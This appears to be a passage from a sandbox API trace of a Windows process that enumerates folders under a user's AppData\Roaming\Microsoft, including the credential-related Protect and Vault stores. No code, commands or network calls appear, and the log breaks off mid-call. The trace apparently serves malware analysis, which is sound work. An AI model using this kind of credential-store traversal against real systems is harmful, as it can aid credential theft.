1 [0266.805] FindNextFileW (in: hFindFile=0x693750, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44792966, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44792966, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xcf753085, ftLastWriteTime.dwHighDateTime=0x1d85953, nFileSizeHigh=0x0, nFileSizeLow=0x4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SYNCHIST", cAlternateFileName="")) returned 1 [0266.805] FindNextFileW (in: hFindFile=0x693750, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0266.805] FindClose (in: hFindFile=0x693750 | out: hFindFile=0x693750) returned 1 [0266.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.805] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\.", nBufferLength=0x105, lpBuffer=0x19ebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect", lpFilePart=0x0) returned 0x37 [0266.805] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling", nBufferLength=0x105, lpBuffer=0x19ec5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling", lpFilePart=0x0) returned 0x38 [0266.805] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.806] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling", nBufferLength=0x105, lpBuffer=0x19ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling", lpFilePart=0x0) returned 0x38 [0266.806] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\", nBufferLength=0x105, lpBuffer=0x19ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\", lpFilePart=0x0) returned 0x39 [0266.806] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\spelling\\*"), lpFindFileData=0x19ee4c | out: lpFindFileData=0x19ee4c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563371fc, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x5635d3c1, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x5635d3c1, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6934d0 [0266.807] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563371fc, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x5635d3c1, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x5635d3c1, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0266.807] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5635d3c1, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x567d5b26, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x567d5b26, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0266.807] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5635d3c1, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x567d5b26, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x567d5b26, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0266.807] FindClose (in: hFindFile=0x6934d0 | out: hFindFile=0x6934d0) returned 1 [0266.808] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.808] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.808] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\.", nBufferLength=0x105, lpBuffer=0x19ebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling", lpFilePart=0x0) returned 0x38 [0266.808] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates", nBufferLength=0x105, lpBuffer=0x19ec5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates", lpFilePart=0x0) returned 0x42 [0266.808] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.808] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates", nBufferLength=0x105, lpBuffer=0x19ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates", lpFilePart=0x0) returned 0x42 [0266.808] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", nBufferLength=0x105, lpBuffer=0x19ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpFilePart=0x0) returned 0x43 [0266.808] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\systemcertificates\\*"), lpFindFileData=0x19ee4c | out: lpFindFileData=0x19ee4c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6934d0 [0266.809] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0266.809] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="My", cAlternateFileName="")) returned 1 [0266.809] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="My", cAlternateFileName="")) returned 0 [0266.809] FindClose (in: hFindFile=0x6934d0 | out: hFindFile=0x6934d0) returned 1 [0266.809] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.809] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.809] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\.", nBufferLength=0x105, lpBuffer=0x19ebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates", lpFilePart=0x0) returned 0x42 [0266.810] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates", nBufferLength=0x105, lpBuffer=0x19ec5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates", lpFilePart=0x0) returned 0x39 [0266.810] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.810] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates", nBufferLength=0x105, lpBuffer=0x19ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates", lpFilePart=0x0) returned 0x39 [0266.810] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\", nBufferLength=0x105, lpBuffer=0x19ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\", lpFilePart=0x0) returned 0x3a [0266.810] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\*"), lpFindFileData=0x19ee4c | out: lpFindFileData=0x19ee4c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80b78b76, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4984c62, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa4984c62, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6934d0 [0266.814] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80b78b76, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4984c62, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa4984c62, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0266.814] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LiveContent", cAlternateFileName="LIVECO~1")) returned 1 [0266.814] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4614163, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4614163, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa46a67ce, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x4641, dwReserved0=0x0, dwReserved1=0x0, cFileName="Normal.dotm", cAlternateFileName="NORMAL~1.DOT")) returned 1 [0266.814] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0266.814] FindClose (in: hFindFile=0x6934d0 | out: hFindFile=0x6934d0) returned 1 [0266.815] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.815] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.815] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\.", nBufferLength=0x105, lpBuffer=0x19ebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates", lpFilePart=0x0) returned 0x39 [0266.816] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Vault", nBufferLength=0x105, lpBuffer=0x19ec5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Vault", lpFilePart=0x0) returned 0x35 [0266.816] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.816] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Vault", nBufferLength=0x105, lpBuffer=0x19ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Vault", lpFilePart=0x0) returned 0x35 [0266.816] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Vault\\", nBufferLength=0x105, lpBuffer=0x19ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Vault\\", lpFilePart=0x0) returned 0x36 [0266.816] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Vault\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\vault\\*"), lpFindFileData=0x19ee4c | out: lpFindFileData=0x19ee4c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb898985, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xb898985, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xb898985, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6934d0 [0266.818] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb898985, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xb898985, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xb898985, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0266.818] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb898985, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xb898985, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xb898985, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0266.818] FindClose (in: hFindFile=0x6934d0 | out: hFindFile=0x6934d0) returned 1 [0266.818] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.818] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.819] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Vault\\.", nBufferLength=0x105, lpBuffer=0x19ebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Vault", lpFilePart=0x0) returned 0x35 [0266.819] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows", nBufferLength=0x105, lpBuffer=0x19ec5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows", lpFilePart=0x0) returned 0x37 [0266.819] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.819] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows", nBufferLength=0x105, lpBuffer=0x19ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows", lpFilePart=0x0) returned 0x37 [0266.819] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\", nBufferLength=0x105, lpBuffer=0x19ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\", lpFilePart=0x0) returned 0x38 [0266.819] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\windows\\*"), lpFindFileData=0x19ee4c | out: lpFindFileData=0x19ee4c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xaeb77be3, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xaeb77be3, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6934d0 [0266.819] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xaeb77be3, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xaeb77be3, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0266.820] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43708645, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43708645, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43708645, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccountPictures", cAlternateFileName="ACCOUN~1")) returned 1 [0266.820] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x4347fe61, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2b1d2cc3, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b1d8e71, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1 [0266.820] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3ced6473, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network Shortcuts", cAlternateFileName="NETWOR~1")) returned 1 [0266.820] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3ced6473, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Printer Shortcuts", cAlternateFileName="PRINTE~1")) returned 1 [0266.820] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3f2cc2fa, ftLastAccessTime.dwHighDateTime=0x1d86028, ftLastWriteTime.dwLowDateTime=0x3f2cc2fa, ftLastWriteTime.dwHighDateTime=0x1d86028, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0266.821] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8c427141, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x8c473662, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0266.821] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0266.821] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3ced6473, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0266.821] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaeb77be3, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xaebea315, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xaebea315, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Themes", cAlternateFileName="")) returned 1 [0266.821] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaeb77be3, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xaebea315, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xaebea315, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Themes", cAlternateFileName="")) returned 0 [0266.822] FindClose (in: hFindFile=0x6934d0 | out: hFindFile=0x6934d0) returned 1 [0266.822] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.822] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.822] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\.", nBufferLength=0x105, lpBuffer=0x19ebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows", lpFilePart=0x0) returned 0x37 [0266.822] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Word", nBufferLength=0x105, lpBuffer=0x19ec5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Word", lpFilePart=0x0) returned 0x34 [0266.822] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.822] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Word", nBufferLength=0x105, lpBuffer=0x19ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Word", lpFilePart=0x0) returned 0x34 [0266.822] GetFullPathNameW 